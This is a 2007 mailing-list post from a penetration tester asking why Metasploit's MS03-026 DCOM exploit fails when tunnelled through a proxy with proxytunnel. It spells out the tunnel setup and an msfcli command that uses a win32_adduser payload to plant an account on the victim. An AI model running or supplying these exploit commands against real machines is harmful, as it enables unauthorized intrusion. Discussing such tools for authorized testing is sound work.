Penetration Testing mailing list archives
Running metasploit thru proxytunnel
From: James Kelly <macubergeek () comcast net>
Date: Sat, 6 Oct 2007 07:18:19 -0400
Folks

I've been banging my head into my keyboard for two days now, not getting anywhere, and I was hoping one of you could smack me upside the head and tell me what I've screwed up.

Problem:
attacker IP: 1.2.3.4
proxy IP: 2.3.4.5
proxy port: 6666
victim: 3.4.5.6
victim port: 7777

Proxytunnel setup:
    proxytunnel -a 666 -p 2.3.4.4:6666 -d 3.4.5.6:7777

**Now, the above config works fine with rdesktop when I use:
    proxytunnel -a 666 -p 2.3.4.5:6666 -d 3.4.5.6:3389
and I do
    rdesktop localhost:666    <--I can ts to the victim box just fine.

When I try to do metasploit over proxytunnel, I do:

config:
Metasploit framework 2
exploit: msrpc_dcom_ms03_026 <--what I like to refer to as "Insecure Shell" ;-) goes to RPORT 135
payload: win32_adduser

first the tunnel:
    proxytunnel -a 235 -p 2.3.4.5:6666 -d 3.4.5.6:135

now metasploit:
    msfcli msrpc_dcom_ms03_026 PAYLOAD=win32_adduser RHOST=localhost RPORT=235 PASS=password USER=blah

When I hit the exploit I see "Sending Request..." then nothing. I can rdesktop via proxytunnel to the victim successfully but cannot log in with username blah, password password.

Assume the victim is vulnerable to dcom. Now, can anyone see anything obvious that I've screwed up?